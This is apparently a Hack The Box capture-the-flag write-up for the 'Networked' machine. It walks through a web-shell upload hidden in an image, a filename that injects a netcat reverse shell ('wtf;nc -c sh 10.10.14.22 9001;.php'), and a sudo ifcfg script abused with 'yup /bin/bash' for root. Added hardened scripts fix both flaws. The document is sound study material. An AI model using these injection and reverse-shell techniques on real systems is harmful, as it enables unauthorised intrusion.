# HTB - Networked

![Networked](/files/-M6YLaAC8XcKNffVJ9qx)

## Getting Root:

1. We find a **backup** directory on the web server that lets us read the source code of the php upload application.
2. We use **GNU GIMP** to embed php code in the comment field of the image properties and upload the **JPEG** to get command execution and a **reverse shell**.
3. We get user **guly** by exploiting a **cron job** that runs a php script every 3 minutes.
4. We get root by exploiting a shell script, runnable with sudo, that changes settings of a network interface.

### Tools Used:

**`nmap, ffuf, gnu gimp, ncat`**

## Nmap

```bash
# Nmap 7.80 scan initiated Mon May  4 12:46:19 2020 as: nmap -sC -sV -p- -oA nmap/allports 10.10.10.146  
Nmap scan report for 10.10.10.146
Host is up (0.54s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May  4 13:12:58 2020 -- 1 IP address (1 host up) scanned in 1599.45 seconds
```

## Enumeration

### HTTP

Enumerating directories

```bash
ffuf -u http://10.10.10.146/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt                                                    

        /'___\  /'___\           /'___\                                                        
       /\ \__/ /\ \__/  __  __  /\ \__/                                                        
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\                                                       
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/                                                       
         \ \_\   \ \_\  \ \____/  \ \_\                                                        
          \/_/    \/_/   \/___/    \/_/                                                        

       v1.0.2                                  
________________________________________________                                               

 :: Method           : GET                     
 :: URL              : http://10.10.10.146/FUZZ                                                
 :: Follow redirects : false                   
 :: Calibration      : false                   
 :: Timeout          : 10                      
 :: Threads          : 40                      
 :: Matcher          : Response status: 200,204,301,302,307,401,403                            
________________________________________________                                               

backup                  [Status: 301, Size: 235, Words: 14, Lines: 8]                          
uploads                 [Status: 301, Size: 236, Words: 14, Lines: 8]                          
:: Progress: [62275/62275] :: Job [1/1] :: 943 req/sec :: Duration: [0:01:06] :: Errors: 3 :: 
```

Enumerating files

```bash
ffuf -c -mc 200 -u http://10.10.10.146/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -e .txt,.php  

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.146/FUZZ
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

.                       [Status: 200, Size: 229, Words: 33, Lines: 9]
upload.php              [Status: 200, Size: 169, Words: 11, Lines: 6]
index.php               [Status: 200, Size: 229, Words: 33, Lines: 9]
photos.php              [Status: 200, Size: 1533, Words: 78, Lines: 27]
lib.php                 [Status: 200, Size: 0, Words: 1, Lines: 1]
:: Progress: [111126/111126] :: Job [1/1] :: 966 req/sec :: Duration: [0:01:55] :: Errors: 3 ::

```

### Got a backup file

Checking the **backup** directory, we find a **backup.tar** file that contains the same **php** files we found with **ffuf**:

![](/files/-M6YA0JxQtGKfIhnOOKG)

```bash
-rw-r--r-- 1 kali kali 10240 May  4 12:51 backup.tar
-rw-r--r-- 1 kali kali   229 Jul  9  2019 index.php
-rw-r--r-- 1 kali kali  2001 Jul  2  2019 lib.php
-rw-r--r-- 1 kali kali  1871 Jul  2  2019 photos.php
-rw-r--r-- 1 kali kali  1331 Jul  2  2019 upload.php
```

### Checking The Files Found

Analysis of the **upload.php** code

![](/files/-M6YB_yB-IGc0s3-NvPP)

## Exploit

We tried uploading a **php** webshell, but the upload was rejected. Uploading a **JPEG**, however, succeeded.

![](/files/-M6YE5o7b-49oZlECFP0)

### Embedding php code on a JPEG

We use GNU GIMP to embed **php** code in the comment field of the image properties.

![](/files/-M6YDhFCkOO8DF1Ksqru)

This gives us command execution, and we catch a reverse shell with **netcat**.

![](/files/-M6YDYfNaqMY_6hF84w0)

```bash
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:49080.
id
uid=48(apache) gid=48(apache) groups=48(apache)
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
```

## Privilege Escalation

### Getting User Guly

The user flag is under the home directory of **guly**, but we can't read it yet. There are some files we can read; one of them is a **`crontab`** that executes the **`check_attack.php`** script every 3 minutes.

```bash
bash-4.2$ ls -la /home/guly
ls -la /home/guly
total 28
drwxr-xr-x. 2 guly guly 159 Jul  9  2019 .
drwxr-xr-x. 3 root root  18 Jul  2  2019 ..
lrwxrwxrwx. 1 root root   9 Jul  2  2019 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly  18 Oct 30  2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30  2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30  2018 .bashrc
-rw-------  1 guly guly 639 Jul  9  2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
-rw-r--r--  1 root root  44 Oct 30  2018 crontab.guly
-r--------. 1 guly guly  33 Oct 30  2018 user.txt

```

```bash
bash-4.2$ cat crontab.guly
cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php
bash-4.2$ 


bash-4.2$ cat check_attack.php
cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

```

Analysis of the **check\_attack.php** code

1. The script reads every file under **`/var/www/html/uploads`**.
2. It uses `preg_grep` to skip files whose name begins with a **.** (hidden files).
3. For each remaining file it checks the name and extension with `getnameCheck` and `check_ip`; if the check fails, it logs the event, removes the file with `exec("nohup /bin/rm -f $path$value ...")` (the file name is inserted into that command unquoted) and sends an email to **guly**.

![](/files/-M6YHGsk_SI5_piYXH6E)

To exploit the **php** script, we create a file whose name contains shell metacharacters: **`touch 'wtf;nc -c sh 10.10.14.22 9001;.php'`**

Because the file name is inserted into the `rm -f` command unquoted, the shell runs `rm -f /var/www/html/uploads/wtf` (which does nothing, since that file does not exist) and then runs the **netcat** command, which connects back to our kali box.

```bash
# under /var/www/html/uploads
touch 'wtf;nc -c sh 10.10.14.22 9001;.php'

```

```bash
# Got a shell
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:49106.
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
```
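A hardened counterpart to `check_attack.php`, added here as an example and not taken from the box or the writeup: a POSIX shell sweep of the uploads directory that enforces a file-name allowlist and hands the name to `rm` as a single quoted argument instead of interpolating it into a command string, which is exactly the defect the `touch 'wtf;nc ...'` trick above abuses. The directory, the allowed extensions and the sample names in the comments are assumptions.

```sh
#!/bin/sh
# Added example (not part of the original writeup or the box): a hardened
# sweep of an uploads directory. It closes the two defects of check_attack.php:
#   1. the file name is never parsed by a shell ("$path" is one argument, and
#      "--" stops option parsing even when the name starts with '-');
#   2. there is an explicit allowlist for what an upload name may look like.
# The directory and the extension list below are assumptions.

# Return 0 if NAME is an acceptable upload name, 1 otherwise.
# Allowed: [A-Za-z0-9_-], exactly one dot, and an allowlisted image extension.
# Spaces, ';', '$', quotes, hidden files and double extensions are rejected.
is_safe_upload_name() {
    case $1 in
        '')                 return 1 ;;  # empty name
        .*)                 return 1 ;;  # hidden file (.htaccess, ...)
        *[!A-Za-z0-9_.-]*)  return 1 ;;  # any character outside the allowlist
        *.*.*)              return 1 ;;  # more than one dot: no shell.php.jpg
    esac
    case $1 in
        *.jpg|*.jpeg|*.png|*.gif) return 0 ;;
        *)                        return 1 ;;
    esac
}

# Remove every file in DIR ($1) whose name is not safe and print the removed
# names, one per line. Hidden files are included via the second glob.
sweep_uploads() {
    for path in "$1"/* "$1"/.[!.]*; do
        [ -e "$path" ] || continue        # glob matched nothing
        name=${path##*/}
        if ! is_safe_upload_name "$name"; then
            rm -f -- "$path"              # name is one argument, never a command
            printf '%s\n' "$name"
        fi
    done
}
```

Run it as `sweep_uploads /var/www/html/uploads` from cron in place of the PHP script. A name such as `wtf;nc -c sh 10.10.14.22 9001;.php` is rejected by the allowlist and, even if it were not, `rm -f -- "$path"` would treat the whole string as one file name.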

### Getting Root

```bash
# To get root
[guly@networked ~]$ sudo -l
sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh
[guly@networked ~]$
```

```bash
# The script
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
  
/sbin/ifup guly0
```

The regex allows spaces, so a value with a space is accepted and written to the ifcfg file as is (for example `NAME=yup /bin/bash`). When the network scripts later source that file, the part after the space runs as a command. For example:\
`eth0 /bin/bash`

```bash
# Got root
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
sudo /usr/local/sbin/changename.sh
interface NAME:
yup /bin/bash
yup /bin/bash
interface PROXY_METHOD:
nope
nope
interface BROWSER_ONLY:
nope
nope
interface BOOTPROTO:
nope
nope
[root@networked network-scripts]# id
id
uid=0(root) gid=0(root) groups=0(root)
```
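A hardened version of the input handling in `changename.sh`, added here as an example and not the box's own script: the allowlist drops the space and the slash, so `yup /bin/bash` is rejected before it is written, and each value is written double-quoted so that even an accepted value is never parsed as a command when the file is sourced. The output path and the four field names are assumptions taken from the script above.

```sh
#!/bin/sh
# Added example (not part of the original writeup or the box): hardened
# collection of interface settings for an ifcfg file. Two changes close the
# hole exploited above:
#   1. the allowlist contains no space or slash, so "yup /bin/bash" is rejected;
#   2. values are written as VAR="value", so a sourced ifcfg file never
#      executes anything after the '=' as a command.
# The output file path and field names are assumptions.

# Return 0 if VALUE ($1) is 1-64 characters from [A-Za-z0-9_-], 1 otherwise.
valid_ifcfg_value() {
    case $1 in
        '')                return 1 ;;  # empty
        *[!A-Za-z0-9_-]*)  return 1 ;;  # space, '/', ';', '$', quotes, ...
    esac
    [ "${#1}" -le 64 ]
}

# Append VAR="VALUE" to FILE ($1 file, $2 var, $3 value). Only the four fields
# the original script sets are accepted; returns 1 and writes nothing otherwise.
write_ifcfg_entry() {
    case $2 in
        NAME|PROXY_METHOD|BROWSER_ONLY|BOOTPROTO) ;;
        *) return 1 ;;
    esac
    valid_ifcfg_value "$3" || return 1
    printf '%s="%s"\n' "$2" "$3" >> "$1"
}

# Same prompt loop as the original, writing to FILE ($1): keep asking until a
# value passes. Reads stdin, so it can also be driven non-interactively.
collect_ifcfg() {
    for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        while :; do
            printf 'interface %s:\n' "$var"
            IFS= read -r x || return 1
            write_ifcfg_entry "$1" "$var" "$x" && break
            echo "wrong input, try again"
        done
    done
}
```

With this in place of the loop in `changename.sh`, the session shown above stops at `interface NAME:` with `wrong input, try again` for `yup /bin/bash`, and a plain `eth0` lands in the file as `NAME="eth0"`.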

